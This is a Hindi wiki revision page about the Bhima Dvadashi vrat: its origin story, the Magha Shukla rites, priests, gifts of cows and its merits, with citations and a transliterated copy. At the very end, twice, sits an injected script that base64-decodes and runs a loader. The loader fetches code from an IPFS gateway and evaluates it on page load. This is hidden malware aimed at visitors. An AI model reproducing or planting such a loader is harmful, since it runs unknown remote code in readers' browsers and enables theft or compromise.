Difference between revisions of "भीम द्वादशी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - ")</ref" to "</ref")
 
Line 2: Line 2:
 
*यह सर्वप्रथम [[विष्णु|वासुदेव]] के द्वारा [[पाण्डव]] [[भीम]] को बतायी गयी थी, अतः इसका यह नाम पड़ा है।  
 
*यह सर्वप्रथम [[विष्णु|वासुदेव]] के द्वारा [[पाण्डव]] [[भीम]] को बतायी गयी थी, अतः इसका यह नाम पड़ा है।  
 
*यह पहले कल्याणिनी के नाम से विख्यात थी।  
 
*यह पहले कल्याणिनी के नाम से विख्यात थी।  
*[[मत्स्य पुराण]]<ref>मत्स्य पुराण (69|19-65)</ref> में विस्तृत विवेचन है।<ref>कृत्यकल्पतरु (व्रत0 354-359)</ref>, <ref>हेमाद्रि (व्रत0 1, 1044-1049, पद्मपुराण से उद्धरण)</ref>
+
*[[मत्स्य पुराण]]<ref>मत्स्य पुराण (69|19-65</ref> में विस्तृत विवेचन है।<ref>कृत्यकल्पतरु (व्रत0 354-359</ref>, <ref>हेमाद्रि (व्रत0 1, 1044-1049, पद्मपुराण से उद्धरण</ref>
 
*[[माघ]] [[शुक्ल पक्ष|शुक्ल]] [[दशमी]] पर शरीर में घी लगाना और विष्णु पूजा (नमो नारायण) करना चाहिए।  
 
*[[माघ]] [[शुक्ल पक्ष|शुक्ल]] [[दशमी]] पर शरीर में घी लगाना और विष्णु पूजा (नमो नारायण) करना चाहिए।  
 
*विभिन्न नामों ([[कृष्ण]], [[दामोदर]] आदि) से [[विष्णु]] के विभिन्न अंगों की पूजा करना चाहिए।  
 
*विभिन्न नामों ([[कृष्ण]], [[दामोदर]] आदि) से [[विष्णु]] के विभिन्न अंगों की पूजा करना चाहिए।  
Line 15: Line 15:
 
*आगे की तिथि ([[त्रयोदशी]]) पर 13 गायों का दान करना चाहिए।  
 
*आगे की तिथि ([[त्रयोदशी]]) पर 13 गायों का दान करना चाहिए।  
 
*पुरोहितों के प्रस्थान के उपरान्त 'केशव प्रसन्न हों' विष्णु, शिव के तथा शिव विष्णु के हृदय हैं' का कथन करना चाहिए।  
 
*पुरोहितों के प्रस्थान के उपरान्त 'केशव प्रसन्न हों' विष्णु, शिव के तथा शिव विष्णु के हृदय हैं' का कथन करना चाहिए।  
*इतिहास एवं [[पुराण]] सुनना<ref>[[गरुड़ पुराण]] (1|127)</ref> चाहिए।  
+
*इतिहास एवं [[पुराण]] सुनना<ref>[[गरुड़ पुराण]] (1|127</ref> चाहिए।  
 
*माघ शुक्ल द्वादशी पर; यह [[विदर्भ]] के राजा एवं [[दमयन्ती]] के पिता भीम द्वारा [[पुलस्त्य]] को बताया गया था।  
 
*माघ शुक्ल द्वादशी पर; यह [[विदर्भ]] के राजा एवं [[दमयन्ती]] के पिता भीम द्वारा [[पुलस्त्य]] को बताया गया था।  
 
*समान ही व्यवस्थाएँ करना चाहिए।  
 
*समान ही व्यवस्थाएँ करना चाहिए।  
 
*ऐसी मान्यता है कि कर्ता सभी पापों से मुक्त हो जाता है।  
 
*ऐसी मान्यता है कि कर्ता सभी पापों से मुक्त हो जाता है।  
*यह व्रत वाजपेय, अतिरात्र आदि से श्रेष्ठ है।<ref>हेमाद्रि (व्रत0 1, 1049-1053, भविष्योत्तरपुराण से उद्धरण)</ref>
+
*यह व्रत वाजपेय, अतिरात्र आदि से श्रेष्ठ है।<ref>हेमाद्रि (व्रत0 1, 1049-1053, भविष्योत्तरपुराण से उद्धरण</ref>
  
 
{{संदर्भ ग्रंथ}}
 
{{संदर्भ ग्रंथ}}

Latest revision as of 12:38, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • yah sarvapratham vasudev ke dvara pandav bhim ko batayi gayi thi, atah isaka yah nam p da hai.
  • yah pahale kalyanini ke nam se vikhyat thi.
  • matsy puran[1] mean vistrit vivechan hai.[2], [3]
  • magh shukl dashami par sharir mean ghi lagana aur vishnu pooja (namo narayan) karana chahie.
  • vibhinn namoan (krishna, damodar adi) se vishnu ke vibhinn aangoan ki pooja karana chahie.
  • garu d pooja; shiv, ganesh ki pooja karani chahie.
  • ekadashi ko poorn upavas karana chahie.
  • dvadashi ko nadi mean snan karana chahie.
  • ghar ke samaksh mandap ka nirman karana chahie.
  • toran se ek jalapoorn ghat latakana tatha usaki peandi mean ek chhed karake ratri bhar apane hath par use tapakana karana chahie.
  • rrigved mean parangat char purohitoan dvara hom karana chahie.
  • char yajurvedoan dvara rudr jap, 4 samavediyoan dvara samagan karana chahie.
  • in barah purohitoan ko aangoothiyaan, vastr adi ke dvara samman dena chahie.
  • age ki tithi (trayodashi) par 13 gayoan ka dan karana chahie.
  • purohitoan ke prasthan ke uparant 'keshav prasann hoan' vishnu, shiv ke tatha shiv vishnu ke hriday haian' ka kathan karana chahie.
  • itihas evan puran sunana[4] chahie.
  • magh shukl dvadashi par; yah vidarbh ke raja evan damayanti ke pita bhim dvara pulasty ko bataya gaya tha.
  • saman hi vyavasthaean karana chahie.
  • aisi manyata hai ki karta sabhi papoan se mukt ho jata hai.
  • yah vrat vajapey, atiratr adi se shreshth hai.[5]


tika tippani aur sandarbh

  1. matsy puran (69|19-65
  2. krityakalpataru (vrat0 354-359
  3. hemadri (vrat0 1, 1044-1049, padmapuran se uddharan
  4. garu d puran (1|127
  5. hemadri (vrat0 1, 1049-1053, bhavishyottarapuran se uddharan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>